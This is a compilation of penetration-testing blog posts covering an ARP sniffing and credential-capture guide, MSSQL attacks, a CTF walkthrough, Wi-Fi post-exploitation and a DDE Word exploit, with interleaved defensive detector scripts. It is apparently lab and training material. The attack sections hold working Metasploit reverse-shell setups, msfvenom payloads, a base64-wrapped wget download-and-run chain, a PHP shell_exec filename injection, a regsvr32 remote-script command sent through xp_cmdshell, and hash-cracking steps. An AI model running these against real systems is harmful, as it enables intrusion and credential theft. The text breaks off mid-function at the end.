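    SSIErrorMsg "[SSI directive refused]"
</Directory>
```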

We set up our listener using Metasploit.

msf > use exploit/multi/handler

msf exploit(handler)> set payload python/meterpreter/reverse_tcp

msf exploit(handler)> set lhost 192.168.0.107

msf exploit(handler)> set lport 4444

msf exploit(handler)> exploit

As soon as our payload runs we get the reverse shell, which was the main objective of the challenge.

Author: Sayantan Bera is a technical writer at Hacking Articles and a cyber security enthusiast. Contact Here

The post Hack the H.A.S.T.E. VM Challenge appeared first on Hacking Articles.

Comprehensive Guide to Sniffing


ARP Protocol

The Address Resolution Protocol (ARP) is a communications protocol used for discovering the link layer address associated with a given Internet layer address, a critical function in the Internet protocol suite. ARP was defined by RFC 826 in 1982, and is Internet Standard STD 37. ARP is also the name of the program for manipulating these addresses in most operating systems.

ARP is used for mapping a network address (e.g. an IPv4 address) to a physical address such as a MAC address. For more detail visit Wikipedia.org.

Requirement:

  1. Kali Linux Machine
  2. Windows Machine
  3. Local Area Network
  4. EtterCap tool
  5. VM running Metasploitable
  6. Wireshark (Protocol Analyzer)
  7. XArp tool
  8. FTP Client
  9. Putty Client

ARP Protocol Process

The Address Resolution Protocol is in many ways similar to the Domain Name Service (DNS). Just as DNS resolves a known domain name to an unknown IP address, ARP resolves a known IP address to an unknown MAC address, as shown in the image below.

In the image above, IP address 192.168.1.102 wants to communicate with IP address 192.168.1.101 but does not know its physical (MAC) address. An ARP request is broadcast to all systems on that network, including X.X.X.100, X.X.X.101 and X.X.X.103. When X.X.X.101 receives the request, it replies via unicast with an ARP reply containing its physical (MAC) address, BB-BB-BB-BB-BB-BB. This reply is then placed in the ARP cache and held there for a short time to reduce the amount of ARP traffic on the network. The ARP cache stores the IP, the MAC and a timer for each entry. The timer's duration varies with the operating system: a Windows system may keep an ARP cache entry for about 2 minutes, whereas a Linux machine may retain it for 15 minutes or so.

Let us now begin exploiting the ARP protocol to our advantage!!!

Scenario: consider the setup below, with two Windows hosts, Host A and Host B, as the victims and a Kali Linux machine, Host C, used to target them. In the following image you can see that the attacker has launched an ARP poisoning attack, which has poisoned the ARP tables by pairing the attacker's MAC address with the IPs of both Host A and Host B.

Let’s Begin the ARP Poisoning Attack

The first step is to clear the ARP cache of both hosts. In the command prompt type arp -d, then ping Host A to get a reply, then type arp -a; this shows the physical (MAC) address of the Host A machine.

Similarly, let us do the same on the other system, Host B.

Start Sniffing with Ettercap

Let us now attack both Host A and Host B from Host C, our Kali Linux machine, by starting sniffing with the Ettercap tool as shown in the image below.

Go to Sniff and select Unified sniffing

Select the appropriate network interface, in this case eth0, and click OK.

Now go to the Hosts Tab and Select Scan for Hosts as shown below to scan the connected system in a local network.

You will get a list of all the scanned hosts as shown below. Select our targets from the host list, X.X.X.101 and X.X.X.102, and add them by clicking Add to Target 1 and Add to Target 2 respectively; from the image you can see that both targets are now on our list.

Now go to Mitm (Man in the middle) and select ARP Poisoning. A Dialog box will appear for optional parameters.

Check the box “Sniff remote connection” and click OK

Go to the Start tab and click Start sniffing to target the added Hosts A and B.

Now let us go to our Kali machine, open the terminal and type ifconfig to determine our IP address and physical (MAC) address; in our case the MAC is 00:0c:29:5b:8e:18, as highlighted in the image.

Since we have started the ARP poisoning attack on both victim machines X.X.X.101 and X.X.X.102 from our Kali machine, if we go to either host and type arp -a in the command prompt, we can clearly see that the physical (MAC) address of the other victim has changed to that of the Kali machine. As shown above, the MAC addresses for both X.X.X.102 and X.X.X.107 are the same, which means all traffic from host X.X.X.102 is passing through the Kali machine X.X.X.107.
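An added example, not from the article or Ettercap: the two signs visible in the arp -a output above, one MAC claimed by two IPs and an IP whose MAC has changed, checked by a script over constructed Windows and Linux arp -a tables so a host or a monitoring job can alert on them.

```python
"""Added example, not from the article or any tool it uses: the evidence
the walkthrough reads off 'arp -a' (two IPs sharing one MAC, or an IP whose
MAC suddenly changes), checked programmatically so a host or monitoring
script can raise an alert. Parses both the Windows and the Linux 'arp -a'
layouts; the sample tables below are constructed."""
import re
from typing import Dict, List, Tuple

ARP_LINE = re.compile(
    r"(\d{1,3}(?:\.\d{1,3}){3})\D+?((?:[0-9a-f]{2}[:-]){5}[0-9a-f]{2})", re.IGNORECASE
)


def normalise_mac(mac: str) -> str:
    return mac.lower().replace("-", ":")


def parse_arp_table(text: str) -> Dict[str, str]:
    """Map IPv4 -> MAC from 'arp -a' output (Windows or Linux layout)."""
    table = {}
    for line in text.splitlines():
        m = ARP_LINE.search(line)
        if m:
            table[m.group(1)] = normalise_mac(m.group(2))
    return table


def _is_multicast_or_broadcast(ip: str, mac: str) -> bool:
    first = int(ip.split(".")[0])
    return mac == "ff:ff:ff:ff:ff:ff" or mac.startswith("01:00:5e") or 224 <= first <= 239


def find_shared_macs(table: Dict[str, str]) -> Dict[str, List[str]]:
    """MACs claimed by more than one unicast IP. After the poisoning above,
    the victim's table shows the Kali box's MAC (00:0c:29:5b:8e:18) against
    both the attacker's own IP and the spoofed one."""
    by_mac: Dict[str, List[str]] = {}
    for ip, mac in table.items():
        if not _is_multicast_or_broadcast(ip, mac):
            by_mac.setdefault(mac, []).append(ip)
    return {
        mac: sorted(ips, key=lambda ip: tuple(int(o) for o in ip.split(".")))
        for mac, ips in by_mac.items() if len(ips) > 1
    }


def diff_tables(before: Dict[str, str], after: Dict[str, str]) -> List[Tuple[str, str, str]]:
    """IPs whose MAC changed between two snapshots: (ip, old_mac, new_mac)."""
    return sorted(
        (ip, before[ip], after[ip])
        for ip in before.keys() & after.keys()
        if before[ip] != after[ip]
    )


# constructed 'arp -a' output as it would look on the Windows victim X.X.X.101
ARP_BEFORE_ATTACK = """\
Interface: 192.168.1.101 --- 0xb
  Internet Address      Physical Address      Type
  192.168.1.1           00-50-56-aa-bb-01     dynamic
  192.168.1.102         00-0c-29-11-22-33     dynamic
  192.168.1.107         00-0c-29-5b-8e-18     dynamic
  192.168.1.255         ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
"""
ARP_DURING_ATTACK = """\
Interface: 192.168.1.101 --- 0xb
  Internet Address      Physical Address      Type
  192.168.1.1           00-50-56-aa-bb-01     dynamic
  192.168.1.102         00-0c-29-5b-8e-18     dynamic
  192.168.1.107         00-0c-29-5b-8e-18     dynamic
  192.168.1.255         ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
"""
# the same poisoned view in the Linux 'arp -a' layout (constructed)
ARP_LINUX_SAMPLE = """\
? (192.168.1.102) at 00:0c:29:5b:8e:18 [ether] on eth0
? (192.168.1.107) at 00:0c:29:5b:8e:18 [ether] on eth0
"""

if __name__ == "__main__":
    before, during = parse_arp_table(ARP_BEFORE_ATTACK), parse_arp_table(ARP_DURING_ATTACK)
    print("shared MACs:", find_shared_macs(during))
    print("changed entries:", diff_tables(before, during))
```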

Demonstrate MITM with Wireshark

Let us now open Wireshark on our Kali machine and analyse the packets, filtering them with icmp && (eth.src == 00:0c:29:5b:8e:18 || eth.dst == 00:0c:29:5b:8e:18). Here eth.src means Ethernet source and eth.dst Ethernet destination; the MAC address used for both is the physical (MAC) address of our Kali machine. What we see is that packets from source IP X.X.X.102 to destination X.X.X.101 are captured by the Kali machine, whose MAC address is 00:0c:29:5b:8e:18, proving that sniffing of the victim machine succeeded.

Combining DNS Spoofing with sniffing

Let us now attack both of our victim machines with a DNS spoofing attack.

On your Kali machine open the file /root/etc/ettercap/etter.dns, remove any existing content, add the entry * A <your Kali Linux IP address> as shown below, and save the file.

The next step is to go to the Ettercap Plugins menu and click Manage the plugins as shown below:

Now select the dns_spoof plug-in; once selected, a (*) sign appears next to it.

Now if we type ping www.google.com on the victim machine, we observe that the reply comes from IP X.X.X.107, our Kali machine, which means the Kali machine has become the DNS server for the victim.

Let us now add one more plug-in the same way we added dns_spoof; this time we use the remote_browser plug-in as shown in the image below. Once this plug-in is added, you can capture all the browsing activity the victim performs, including usernames and passwords.

Capturing NTLM passwords

Open a Kali terminal and type msfconsole; once the console starts type search http_ntlm, then use auxiliary/server/capture/http_ntlm as shown in the image below:

This module attempts to quietly catch NTLM/LM Challenge hashes.

use auxiliary/server/capture/http_ntlm

msf auxiliary(http_ntlm) > set srvhost 192.168.0.107

msf auxiliary(http_ntlm) > set SRVPORT 80

msf auxiliary(http_ntlm) > set URIPATH /

msf auxiliary(http_ntlm) > set JOHNPWFILE /root/Desktop/

msf auxiliary(http_ntlm) > exploit

With the trap above in place, this module captures the NTLM hash from the victim's system when he opens any HTTP website in his browser, because that request is redirected to the attacker's IP.

From the image below you can see the victim trying to browse "imdb.com", but the page requires authentication and asks for his username and password. If he tries to open something else, say google.com, he is asked for a username and password there as well; until the victim submits his credentials he cannot browse anything.

As soon as the victim enters a username and password, the attacker captures the NTLM hash on his system in the background.

Great!! The attacker has captured the NTLMv2 hash; now let us look at what else, apart from the hash value, the attacker has captured.

From the image you can see that the attacker has captured two more things:

Username: raj

Machine name: WIN-1GKSSJ7D2AE

Now use John the Ripper to crack the NTLMv2 hash by executing the command below:

john _netntlmv2

From the image below you can confirm that we have successfully cracked the captured hash: the username is raj and the password is 123.

Combining DHCP Spoofing with sniffing

DHCP spoofing: the attacker sets up a fake DHCP server on the local network that answers clients' DHCP requests with false IP configuration.

Go to Ettercap, click on Mitm and select DHCP spoofing.

As in the image below, provide the necessary information:

  • IP Pool – 192.168.0.200-210 (an IP range to hand out to systems joining the network; this makes Ettercap act as the DHCP server)
  • Netmask – 255.255.255.0 (as per the IP class)
  • DNS Server IP – 192.168.0.1 (as per the IP class)

Click OK and Start sniffing

Here I have powered on the Metasploitable server; the image below shows that it received the IP 192.168.0.202, which is from the pool we configured in Ettercap's DHCP spoofing.

Let us now go to the client machine and connect to the Metasploitable server with an FTP (File Transfer Protocol) client as shown in the image below.

Provide the host name (IP), user name and password to connect to the FTP server.

From the image below we can see that the FTP username and password supplied by the client are captured by Ettercap; in our case User: msfadmin, PASS: msfadmin.

From the image below you can see that we now connect to the Metasploitable server (192.168.0.202) over telnet on port 23 using PuTTY. It prompts for a username and password; provide them.

From the above image we can clearly see that Ettercap has captured the credentials provided by the user for the telnet service; in our case User: msfadmin, Pass: msfadmin.

HTTP Password Sniffing

Let us now do the same over HTTP (Hypertext Transfer Protocol).

From the image below we can see that DVWA is running on our Metasploitable server. In the client browser we open 192.168.0.202/dvwa/login.php, which prompts for a username and password; let's provide the credentials.

We can see from the image below that Ettercap has once again captured the username and password the user entered in the browser; in our case username: admin and PASS: password for the HTTP service.

SMTP Password Sniffing

Lastly, let us try this with SMTP (Simple Mail Transfer Protocol) sniffing.

The first step is to configure an SMTP server in your environment; please click Here for how to configure an SMTP server on a Windows machine.

Once the server is configured and we have set up email clients on the target machines, let us open Ettercap, add both our targets X.X.X.102 and X.X.X.104 and select ARP poisoning.

Now let us send an email from Target A to Target B as shown below.

Here Target A: raj@pentestlab.local is the sender, sending a message to Target B: aarti@pentestlab.local, and hence port 25 for the SMTP service will come into action.

The given below image confirms that Aarti has received Raj’s mail successfully, while in the background the attacker is sniffing all the traffic passing through the router.

If we now go to the Ettercap console, we can clearly see that it has successfully sniffed the traffic between Target A and Target B and captured the credentials of Target A (Raj), as shown in the above image.

Capture Email of SMTP Server with Wireshark

Go to Wireshark and apply the filter smtp && (eth.src == 00:0c:29:4a:47:75 || eth.dst == 00:0c:29:4a:47:75). The MAC address filter is for our Kali machine; you will observe it has captured packets from both our target machines.

It has sniffed all SMTP packets and captured both email IDs, i.e. sender and receiver, together with the message sent to Target B, which is “Hello Friends today we are performing smtp sniffing”. This shows that our attack on the selected targets has been successful, as shown in the image below.

Throughout this article we discussed ways and techniques that can be used to exploit the ARP protocol successfully; let us now briefly discuss the technique used to detect an ARP attack.

ARP Attack Detection

There are various tools available to detect ARP attacks; one of the most common is the XArp tool, which we will be using for this article.

We can run this tool on any host machine in the network to detect an ARP attack. The above image shows the affected systems on the network highlighted in red (X). We can disconnect these hosts from the network and decide upon the next course of action to mitigate these risks by implementing the following controls:

  1. Dynamic address inspection
  2. DHCP snooping
  3. VLAN hopping prevention
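An added example (not XArp and not code from the article) of the core check an ARP-spoofing detector makes: remember the first MAC seen for each IP, flag any later reply that claims the same IP from a different MAC (a change of the gateway’s binding scores highest), and flag a single MAC that claims several IPs. The MACs and the reply sequence below are constructed; the IPs are the ones from this lab.

```python
"""Minimal ARP-spoofing detector: added example, not XArp and not the article's code."""
from collections import defaultdict
from dataclasses import dataclass, field


@dataclass(frozen=True)
class ArpReply:
    """One ARP 'is-at' reply as a sniffer on the LAN would see it."""
    sender_ip: str
    sender_mac: str


@dataclass
class ArpWatch:
    gateway_ip: str                                  # poisoning the gateway binding is the classic MITM
    trusted: dict = field(default_factory=dict)      # ip -> first MAC seen (assumed legitimate)
    claims: dict = field(default_factory=lambda: defaultdict(set))  # mac -> every IP it has claimed
    alerts: list = field(default_factory=list)       # (severity, message)

    def observe(self, reply: ArpReply) -> None:
        ip, mac = reply.sender_ip, reply.sender_mac.lower()
        known = self.trusted.setdefault(ip, mac)
        if known != mac:
            # The same IP is now answered by a different hardware address: the signature of ARP poisoning.
            sev = "HIGH" if ip == self.gateway_ip else "MEDIUM"
            self.alerts.append((sev, f"{ip} moved from {known} to {mac}"))
        self.claims[mac].add(ip)
        if len(self.claims[mac]) == 2:
            # Fire once per MAC, the first time it claims a second IP (a poisoner answers for several hosts).
            self.alerts.append(("MEDIUM", f"{mac} claims several IPs: {sorted(self.claims[mac])}"))


def analyze(replies, gateway_ip):
    """Run every reply through the watcher and return the alerts it raised, in order."""
    watch = ArpWatch(gateway_ip)
    for reply in replies:
        watch.observe(reply)
    return watch.alerts


# Constructed sample traffic: hypothetical MACs, IPs from the lab in the article.
SAMPLE_REPLIES = [
    ArpReply("192.168.0.1",   "00:0c:29:aa:aa:aa"),  # real gateway
    ArpReply("192.168.0.202", "00:0c:29:bb:bb:bb"),  # metasploitable server
    ArpReply("192.168.0.1",   "00:0c:29:cc:cc:cc"),  # poisoner answering for the gateway
    ArpReply("192.168.0.202", "00:0c:29:cc:cc:cc"),  # same MAC now answering for the server too
]

if __name__ == "__main__":
    for severity, message in analyze(SAMPLE_REPLIES, "192.168.0.1"):
        print(severity, message)
```

Real tools seed the trusted table from a known inventory rather than from the first reply seen, since a poisoner that answers before the real host would otherwise be trusted.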

Author: Krishnan Sharma is a technology professional having passion for information security and related fields, he loves technical writing and is part of our hacking article team, he may be contacted Here

The post Comprehensive Guide to Sniffing appeared first on Hacking Articles.

MSSQL Penetration Testing with Metasploit


Hello friends, today we are performing MSSQL penetration testing using the Metasploit framework in order to retrieve basic information such as database names, usernames, table names, etc. from inside a SQL server running on a Windows operating system. In our previous article we had set up Microsoft SQL Server on Windows 10.

Requirement

Attacker: kali Linux (NMAP)

Target: Windows 10 (MS SQL Server)

Let’s start!!

MSSQL Brute force Attack

This module simply queries the MSSQL instance for a specific user/pass (default is sa with blank).

use auxiliary/scanner/mssql/mssql_login

msf auxiliary(mssql_login) > set rhosts 192.168.1.104

msf auxiliary(mssql_login) > set user_file /root/Desktop/user.txt

msf auxiliary(mssql_login) > set pass_file /root/Desktop/pass.txt

msf auxiliary(mssql_login) > run

This will perform a brute force attack, matching valid username and password combinations from the given dictionaries.

In the specified image you can observe that we have successfully retrieved credentials for two users:

Username: ignite and password: 12345

Username: sa and password: 123

Enumerate MSSQL configuration settings

This module will perform a series of configuration audits and security checks against a Microsoft SQL Server database. For this module to work, valid administrative user credentials must be supplied.

use auxiliary/admin/mssql/mssql_enum

msf auxiliary(mssql_enum) > set rhosts 192.168.1.104

msf auxiliary(mssql_enum) > set password admin123

msf auxiliary(mssql_enum) > run

The above module has dumped the MSSQL configuration settings, where you can observe enabled and disabled functions. For example:

xp_cmdshell is enabled, which is a feature of Microsoft SQL Server that allows system administrators to execute operating system commands. An attacker can inject malicious commands or files to gain unauthorized access to the server.

Identifying SQL Server logins

This module can be used to obtain a list of all logins from a SQL Server with any login. Selecting all of the logins from the master..syslogins table is restricted to sysadmins. However, logins with the PUBLIC role (everyone) can quickly enumerate all SQL Server logins using the SUSER_SNAME function by fuzzing the principal_id parameter. This is pretty simple, because the principal IDs assigned to logins are incremental. Once logins have been enumerated they can be verified via sp_defaultdb error analysis. This is important, because not all of the principal IDs resolve to SQL logins (some resolve to roles instead). Once logins have been enumerated, they can be used in dictionary attacks.

use auxiliary/admin/mssql/mssql_enum_sql_logins

msf auxiliary(mssql_enum_sql_logins) > set rhosts 192.168.1.104

msf auxiliary(mssql_enum_sql_logins) > set password admin123

msf auxiliary(mssql_enum_sql_logins) > run

From the given below image you can confirm the MSSQL Server logins, such as “sa”, which is also a sysadmin, and another user “ignite”. Once you have enumerated all logins, you can run a dictionary attack against their passwords.

Identify Database owner

This module can be used to escalate privileges to sysadmin if the user has the db_owner role in a trustworthy database owned by a sysadmin user. Once the user has the sysadmin role the mssql_payload module can be used to obtain a shell on the system.

use auxiliary/admin/mssql/mssql_escalate_dbowner

msf auxiliary(mssql_escalate_dbowner) > set rhosts 192.168.1.104

msf auxiliary(mssql_escalate_dbowner) > set password admin123

msf auxiliary(mssql_escalate_dbowner) > run

The above module will identify whether the specified user has the system administrator role or not. From the given below image you can see that “sa” is a sysadmin user.

Identify a user with masquerade privilege

This module can be used to escalate privileges if the IMPERSONATE privilege has been assigned to the user. In most cases this results in additional data access, but in some cases it can be used to gain sysadmin privileges.

use auxiliary/admin/mssql/mssql_escalate_execute_as

msf auxiliary(mssql_escalate_execute_as) > set rhosts 192.168.1.104

msf auxiliary(mssql_escalate_execute_as) > set password admin123

msf auxiliary(mssql_escalate_execute_as) > run

From the given below image you can see that “sa” is a sysadmin user.

Execute SQL Statement

This module will allow for simple SQL statements to be executed against a MSSQL/MSDE instance given the appropriate credentials.

use auxiliary/admin/mssql/mssql_sql

msf auxiliary(mssql_sql) > set rhosts 192.168.1.104

msf auxiliary(mssql_sql) > set password admin123

msf auxiliary(mssql_sql) > run

From the given below image you can observe that by default it has run a SQL statement to select the version; as a result it has dumped the complete version details of the SQL server. Here you can execute your own SQL statements.

Retrieve MSSQL Password Hashes of Users

This module extracts the usernames and encrypted password hashes from a MSSQL server and stores them for later cracking. This module also saves information about the server version and table names, which can be used to seed the wordlist.

use auxiliary/scanner/mssql/mssql_hashdump

msf auxiliary(mssql_hashdump) > set rhosts 192.168.1.104

msf auxiliary(mssql_hashdump) > set password admin123

msf auxiliary(mssql_hashdump) > run

From the given below image you can read the password hash value set for every database user on the MSSQL server.

Decode Password Hashes of Users

This module uses John the Ripper to identify weak passwords that have been acquired from the mssql_hashdump module. Passwords that have been successfully cracked are then saved as proper credentials.

use auxiliary/analyze/jtr_mssql_fast

msf auxiliary(jtr_mssql_fast) > run

Great!! The tool John the Ripper has successfully cracked the password hashes.

Extracting MSSQL Schema Information

This module attempts to extract the schema from a MSSQL Server Instance. It will disregard builtin and example DBs such as master, model, msdb, and tempdb. The module will create a note for each DB found, and store a YAML formatted output as loot for easy reading.

use auxiliary/scanner/mssql/mssql_schemadump

msf auxiliary(mssql_schemadump) > set rhosts 192.168.1.104

msf auxiliary(mssql_schemadump) > set password admin123

msf auxiliary(mssql_schemadump) > run

Here it has dumped the information schema for the database “ignite” with table name “student”, 4 column names with column types:

DB: ignite

Table name: student_details

  • Ranking (CT: Numeric; CL = 9)
  • NAME (CT: nvarchar; CL = 100)
  • Class (CT: nchar; CL = 20)
  • Name (CT: sysname; CL = 100)

Execute malicious .dll code through xp_cmdshell as a CMD statement

This module simplifies the Regsvr32.exe Application Whitelisting Bypass technique. The module creates a web server that hosts an .sct file. When the user types the provided regsvr32 command on a system, regsvr32 will request the .sct file and then execute the included PowerShell command. This command then downloads and executes the specified payload (similar to the web_delivery module with PSH). Both web requests (i.e., the .sct file and PowerShell download and execute) can occur on the same port.

use exploit/windows/misc/regsvr32_applocker_bypass_server

msf exploit(regsvr32_applocker_bypass_server) > set lhost 192.168.1.115

msf exploit(regsvr32_applocker_bypass_server) > set lport 4455

msf exploit(regsvr32_applocker_bypass_server) > run

Since we know the xp_cmdshell function is enabled on the SQL server, we can easily hit the target machine by injecting a malicious .dll file through the xp_cmdshell function.

After executing the above module we will get the malicious .dll code highlighted in the below image; copy this code for injecting into xp_cmdshell as a statement.

This module will execute a Windows command on a MSSQL/MSDE instance via the xp_cmdshell procedure. A valid username and password is required to use this module.

use auxiliary/admin/mssql/mssql_exec

msf auxiliary(mssql_exec) > set rhosts 192.168.1.104

msf auxiliary(mssql_exec) > set password admin123

msf auxiliary(mssql_exec) > set CMD "regsvr32 /s /n /u /i:http://192.168.1.115:8080/P8LsfwnWN.sct scrobj.dll"

msf auxiliary(mssql_exec) > run

If you observe the commands set in the specified module above, you will notice that we have set the copied malicious .dll code as the CMD statement. Hence, as soon as we run this exploit it creates a backdoor in the victim’s machine for unauthorized access.

Wonderful!! We have got a reverse connection to the target machine through a meterpreter session.

Exploit xp_cmdshell vulnerability

This module executes an arbitrary payload on a Microsoft SQL Server by using the “xp_cmdshell” stored procedure. Currently, three delivery methods are supported. First, the original method uses Windows ‘debug.com’. File size restrictions are avoided by incorporating the debug bypass method presented by SecureStat at Defcon 17. Since this method invokes ntvdm, it is not available on x64 systems. A second method takes advantage of the Command Stager subsystem. This allows using various techniques, such as using a TFTP server, to send the executable. By default the Command Stager uses ‘wscript.exe’ to generate the executable on the target. Finally, ReL1K’s latest method utilizes PowerShell to transmit and recreate the payload on the target. NOTE: This module will leave a payload executable on the target system when the attack is finished.

use exploit/windows/mssql/mssql_payload

msf exploit(mssql_payload) > set rhost 192.168.1.104

msf exploit(mssql_payload) > set password admin123

msf exploit(mssql_payload) > set srvhost 192.168.1.115

msf exploit(mssql_payload) > run

Awesome!! Once again we have got a reverse connection to the target machine through a meterpreter session.

Author: Sanjeet Kumar is an Information Security Analyst | Pentester | Researcher. Contact Here

The post MSSQL Penetration Testing with Metasploit appeared first on Hacking Articles.

Hack the dina VM (CTF Challenge)


Hello friends! Today we are going to take another CTF challenge known as dina. The credit for making this VM goes to “Touhid Shaikh”, and it is another boot2root challenge where we have to root the server to complete the challenge. You can download this VM here.

Let’s Breach!!!

Let us start by getting the IP of the VM (here I have it at 192.168.1.104, but you will have to find your own).

netdiscover

Use nmap for port enumeration.

nmap -sV 192.168.1.104

The Nmap scan shows us port 80 is open, so we open the IP address in our browser.

We don’t find anything on the web page. So we use dirb to find the directories for more information.

dirb http://192.168.1.104/

We find robots.txt; we open robots.txt in our browser and find the names of directories on the server.

We open the nothing/ directory and find a 404 page. We take a look at the source code of the web page and find a few passwords.

Now we open the secure/ directory that we found using dirb. Inside the directory we find a zip file, which we download to our system.

After downloading it to our system we try to unzip it, but it prompts for a password. So we try one of the passwords that we found earlier inside the web page. The password turns out to be ‘freedom’.

Now after we extract the file we find an mp3 file. We check the file type and find out it is actually an ASCII file. We open it and find a username and the name of a directory.

Now we open the directory and find a login page. We use one of the passwords from the web page.

We use the username touhid and find the password to be diana.

After logging in we find that the author has created a vulnerable application. The details of how to exploit this vulnerability are given by the author here.

First we setup our listener using metasploit.

msf > use exploit/multi/handler

msf exploit(handler) > set payload linux/x86/meterpreter/reverse_tcp

msf exploit(handler) > set lhost 192.168.1.124

msf exploit(handler) > set lport 4444

msf exploit(handler) > run

Now we create our payload using msfvenom:

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.1.124 lport=4444 -f elf > /var/www/html/shell

Now we convert the commands that will upload and run the shell to base64 to bypass the firewall.

echo 'wget http://192.168.1.124/shell -O /tmp/shell' | base64

echo 'chmod 777 /tmp/shell' | base64

echo '/tmp/shell' | base64

Now, to execute the upload of our shell, we rename the file we upload so that its name contains our PHP code, which executes our shell commands. We use the following code as the name of the file we upload.

<?php shell_exec(base64_decode('base64encodestring')); die();?>\".php

Now as soon as we execute our shell we get a reverse connection. We take a look at the sudoers list and find that we have access to perl, so we spawn our shell using perl.

sudo -l

sudo perl -e "exec '/bin/sh'"

Now we go to the root folder and find the final flag. When we open the flag we find a message congratulating us on the completion of the challenge.

Author: Sayantan Bera is a technical writer at hacking articles and cyber security enthusiast. Contact Here

The post Hack the dina VM (CTF Challenge) appeared first on Hacking Articles.


Wifi Post Exploitation on Remote PC


Hello readers! Today you will be learning different ways to get the basic service set information of a remote user’s Wi-Fi as well as the current network connection information, how to extract the saved wireless LAN profiles of a remote PC, and after that how to disconnect the target user’s Wi-Fi too.

First hack the victim PC using Metasploit (tutorial: how to hack a remote PC), then get admin access through Bypassuac (click here).

After getting the meterpreter of the victim PC, background the current session and type the command given below. This will provide you a list of the different post modules that you can use for the desired purpose. Here we will be using the last four in the list. Here you go…

Get BSS information of a remote user’s Wi-Fi connection

This module gathers information about the wireless Basic Service Sets available to the victim machine.

e.g. this will give you the SSID and other important information regarding the wireless connection.

msf > use post/windows/wlan/wlan_bss_list

msf post(wlan_bss_list) > set session 5

msf post(wlan_bss_list) > exploit

Get current Wi-Fi connection information of a remote user

This module gathers information about the current connection on each wireless lan interface on the target machine.

msf post(wlan_bss_list) > use post/windows/wlan/wlan_current_connection

msf post(wlan_current_connection) > set session 5

msf post(wlan_current_connection) > run

Get saved wireless LAN profile of a remote user

This module extracts saved Wireless LAN profiles. It will also try to decrypt the network key material. Behavior is slightly different between OS versions when it comes to WPA. In Windows Vista/7 we will get the passphrase. In Windows XP we will get the PBKDF2 derived key.

msf > use post/windows/wlan/wlan_profile

msf post(wlan_profile) > set session 5

msf post(wlan_profile) > exploit

Disconnect a remote user’s Wi-Fi connection

This module disconnects the current wireless network connection on the specified interface.

msf > use post/windows/wlan/wlan_disconnect

msf post(wlan_disconnect) > set session 5

msf post(wlan_disconnect) > exploit

Other Way

I call it a post-exploitation toolkit because it has a lot of features, far beyond the ability to dump plain-text passwords.

meterpreter > load kiwi

meterpreter > help

This will give you the entire wireless connection list, with passwords as well. VOILA! You got it right.

meterpreter > wifi_list

meterpreter > wifi_list_shared

About Author

Nisha Yadav is trained in Certified Ethical Hacking and Bug Bounty Hunting. She is currently working at Hiddenramp as a Security Analyst. Connect with her here

The post Wifi Post Exploitation on Remote PC appeared first on Hacking Articles.

Exploiting Windows Machine with DDE Exploit


DDE stands for “Dynamic Data Exchange”; this is a method used by Windows to let one program subscribe to an item created by another program. This exploit uses that functionality to compromise the victim endpoint. Once the victim opens the Word file, an HTA payload is retrieved via HTTP and a session is achieved.

Here is a step-by-step depiction of how it happens:

The code for the exploit has to be copied into Leafpad and saved with a “.rb” extension; you can name it anything you like, but to avoid any confusion ours is named “dde_delivery.rb”. This file now has to be moved into the windows section of the exploit folder in Metasploit; you can find the path and exploit URL below.

Exploit URL: https://raw.githubusercontent.com/realoriginal/metasploit-framework/fb3410c4f2e47a003fd9910ce78f0fc72e513674/modules/exploits/windows/script/dde_delivery.rb

Path of the windows folder in Kali: /usr/share/metasploit-framework/modules/exploits/windows

Here is what the exploit being pasted into the “windows” folder will look like.

Now open a terminal and start Metasploit. Once it starts, type “use exploit/windows/dde_delivery” and the exploit will load. Once that is done, all you need to do is set srvhost, which is the host IP: type “set srvhost” followed by your IP; you can see what that looks like in the screenshot given below.

Press enter and you’re all set.

Type “exploit” and press Enter.

You will see a code generated; it has been highlighted in the screenshot given below. Copy this code.

NOTE: Do not close the terminal, it must remain active throughout.

Open Microsoft Word, navigate to the “Insert” tab; under the “Text” section you will find “Quick Parts”, click on it and in the drop-down menu you will see “Field…”.

Click on “Field…”; another window will appear. By default it will look like the screenshot pasted below; click OK.

Once you click on OK, the text “! Unexpected End of Formula” will appear. Select this text, right click on it and in the menu choose the option “Toggle Field Codes”.

Once this is done, the text will change to “{ =\* MERGEFORMAT }”.

Paste the code you copied from Metasploit within the “{ }”, as seen below.

Save the file in “.docx” format (you can name it anything you like) and close Microsoft Word.

You now have a handy Word file that can be opened on a Windows 10 machine to achieve a session.

Here is what it looks like when the word file is opened:

Once the Word file is opened, you will see the following message; click “Yes”.

Next this message will appear. Again, click “Yes”.

Finally this message will appear; click “OK”.

Now go back to the terminal in kali for the good part.

You will see that the moment OK is clicked in the image above, Meterpreter comes online and you have achieved a session, just like that!!

If you were wondering why at the beginning we made you manually copy the code into Leafpad and save it into Metasploit, it’s because this is a new exploit that has not yet been added to the Metasploit database.
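From the defender’s side, the field the steps above plant is stored inside the .docx (a zip archive) as a w:instrText run or a w:fldSimple instruction whose code begins with DDE or DDEAUTO, so a document can be triaged for it without opening Word. The scanner below is an added example, not part of this article or of the Metasploit module; the .docx it inspects is constructed in memory and the field’s command text is a placeholder.

```python
"""Scan a .docx for DDE/DDEAUTO field codes: added example, not the article's code."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
W = f"{{{W_NS}}}"
# A DDE field code starts with DDE or DDEAUTO; Word tolerates leading whitespace and quotes.
DDE_RE = re.compile(r'^\s*"?\s*DDE(AUTO)?\b', re.IGNORECASE)
# Fields can live in the body, headers, footers and notes, so scan all of those parts.
PART_RE = re.compile(r"^word/(document|header\d*|footer\d*|footnotes|endnotes)\.xml$")


def field_codes(xml_bytes):
    """Yield every field instruction string found in one XML part."""
    root = ET.fromstring(xml_bytes)
    for p in root.iter(W + "p"):
        # Word often splits one field code over several instrText runs: join them per paragraph.
        pieces = [t.text or "" for t in p.iter(W + "instrText")]
        if pieces:
            yield "".join(pieces)
    for f in root.iter(W + "fldSimple"):
        yield f.get(W + "instr", "")


def scan_docx(data: bytes):
    """Return (part name, field code) pairs that look like DDE fields; empty means clean."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            if PART_RE.match(name):
                for code in field_codes(z.read(name)):
                    if DDE_RE.search(code):
                        hits.append((name, code.strip()))
    return hits


def build_docx(document_xml: str) -> bytes:
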